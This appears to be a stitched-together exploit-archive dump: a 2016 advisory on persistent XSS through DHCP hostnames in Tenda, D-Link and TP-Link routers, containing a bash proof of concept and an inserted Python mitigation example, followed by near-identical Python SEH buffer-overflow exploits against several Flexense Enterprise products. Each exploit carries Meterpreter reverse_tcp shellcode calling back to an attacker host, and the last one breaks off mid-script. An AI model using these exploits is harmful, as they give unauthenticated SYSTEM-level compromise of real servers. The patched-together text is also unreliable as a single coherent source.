Document Title:
===============
Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1990


Release Date:
=============
2016-11-28


Vulnerability Laboratory ID (VL-ID):
====================================
1990


Common Vulnerability Scoring System:
====================================
3.5


Abstract Advisory Information:
==============================
The Vulnerability Laboratory research team discovered a persistent XSS vulnerability in the web application of the Tenda, Dlink & Tplink 1.0.1 TD-W8961ND & ADSL2+ modem routers.


Vulnerability Disclosure Timeline:
==================================
2016-11-28:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent cross-site scripting vulnerability has been discovered in Tenda 1.0.1 ADSL Modem Routers.
The vulnerability allows remote attackers and local privileged accounts to inject malicious script code
on the application side to manipulate the router's DHCP hostnames.

Attackers are able to inject malicious code into the list of current DHCP clients by changing a
DHCP hostname into a valid XSS payload. The vulnerability executes on the application side when the
list is viewed. During our investigation we found that all models running firmware v1.x on the
web GUI are affected by the security vulnerability. Remote attackers can, for example, craft malicious
pages that issue POST requests to manipulate the DHCP hostname listing and client view.

The security risk of the issue is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.5.
Exploitation of the vulnerability requires no privileged web-application user account and only low user interaction.
Successful exploitation of the vulnerability results in phishing attacks, session hijacking, persistent external redirects
to malicious sources, and persistent manipulation of affected or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] DHCP Client List 
[+] DHCP settings

Vulnerable Parameter(s):
[+] Hostnames


Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with a low-privileged application user account and low user interaction.
For a security demonstration or to reproduce the vulnerability, follow the information and steps below.


Manual steps to reproduce the vulnerability ... (local)
1. Open the Router UI
2. Login as basic account
3. Open the DHCP List module via settings
4. Inject a payload to the hostnames input field
5. Save the input
6. Now the list becomes visible with all clients and the payload executes within the context
7. Successful reproduction of the vulnerability!

The following bash script, for supported Linux systems, changes the DHCP hostname of the local machine to an XSS payload by writing it to /etc/hostname.
Save the file as vulnerability.sh, then run chmod +x vulnerability.sh.

PoC: Exploit
#!/bin/bash
GREEN=$(tput setaf 2 && tput bold)
BLUE=$(tput setaf 6 && tput bold)
echo "$BLUE[+] Persistent XSS DHCP Exploiter via Routers"
echo "$GREEN[+] Vulnerability found by : Lawrence Amer "
echo -n "$BLUE[~] type XSS Payload here :"
read -e -r xss
# /etc/hostname is root-owned; the script must run with root privileges for this write to succeed
echo "$xss" > /etc/hostname
echo "$GREEN[+]DHCP HOST NAME IS WRITTEN"


Video: https://www.youtube.com/watch?v=HUM5myJWbvc


Solution - Fix & Patch:
=======================
The XSS vulnerability can be patched by securely parsing the hostname client parameters.
Restrict the input and disallow the use of special characters to close the injection point.
Also sanitize and encode the hostname values at the output location in the active DHCP client list.
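The two controls the solution describes, input restriction and output encoding, worked through in Python as an added example. This is not the router vendors' code: the hostname grammar follows RFC 952/1123, and `SAMPLE_CLIENTS`, `is_valid_hostname`, `sanitize_hostname` and `render_client_list` are names constructed for the illustration.

```python
import html
import re

# RFC 952/1123 host name label: letters, digits and hyphens, no leading or
# trailing hyphen, 1..63 characters. Markup characters can never pass this.
_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
MAX_HOSTNAME_LEN = 253


def is_valid_hostname(name: str) -> bool:
    """True if `name` is a syntactically valid host name (as carried in DHCP option 12)."""
    if not name or len(name) > MAX_HOSTNAME_LEN:
        return False
    return all(_LABEL_RE.match(label) for label in name.split("."))


def sanitize_hostname(name: str, fallback: str = "unknown-host") -> str:
    """Input-side control: keep the host name only if it is valid, otherwise a neutral placeholder."""
    return name if is_valid_hostname(name) else fallback


def render_client_row(client: dict) -> str:
    """Output-side control: HTML-encode every field at the moment it is written into the page,
    so a value that slipped past input validation is displayed as text rather than executed."""
    return "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
        html.escape(client["hostname"], quote=True),
        html.escape(client["mac"], quote=True),
        html.escape(client["ip"], quote=True),
    )


def render_client_list(clients) -> str:
    """Apply both controls and build the DHCP client table."""
    rows = [
        render_client_row({**c, "hostname": sanitize_hostname(c["hostname"])})
        for c in clients
    ]
    return "<table>" + "".join(rows) + "</table>"


# Constructed sample lease records; the second one carries markup in its host name.
SAMPLE_CLIENTS = [
    {"hostname": "laptop-01", "mac": "00:11:22:33:44:55", "ip": "192.168.1.10"},
    {"hostname": "<script>x</script>", "mac": "66:77:88:99:aa:bb", "ip": "192.168.1.11"},
]

if __name__ == "__main__":
    print(render_client_list(SAMPLE_CLIENTS))
```

The validator alone would already have stopped this advisory's payload, but the encoding step in `render_client_row` is the control that matters for the "view" event the advisory describes: it protects the page even when a hostname reaches the lease table by a path that skips the web form, such as a DHCP request from a client on the LAN.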


Security Risk:
==============
The security risk of the persistent XSS web vulnerability in the router web application is estimated as medium. (CVSS 3.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Lawrence Amer (https://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to ask for permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
            
#!/usr/bin/python

print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.34: www.exploit-db.com/exploits/40452/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 10015BFE

nseh = "\x90\x90\xEB\x0B"
seh = "\xFE\x5B\x01\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
            
#!/usr/bin/python

print "Disk Savvy Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.32: www.exploit-db.com/exploits/40459/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 10081A9C

nseh = "\x90\x90\xEB\x0B"
seh = "\x9C\x1A\x08\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "\x42" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
            
#!/usr/bin/python

print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.24: www.exploit-db.com/exploits/40458/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 1004F9DD

nseh = "\x90\x90\xEB\x0B"
seh = "\xDD\xF9\x04\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
            
#!/usr/bin/python

print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 1004FAF3

nseh = "\x90\x90\xEB\x0B"
seh = "\xF3\xFA\x04\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
            
#!/usr/bin/python

print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 8.9.24: www.exploit-db.com/exploits/40456/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 1001A1B8

nseh = "\x90\x90\xEB\x0B"
seh = "\xB8\xA1\x01\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
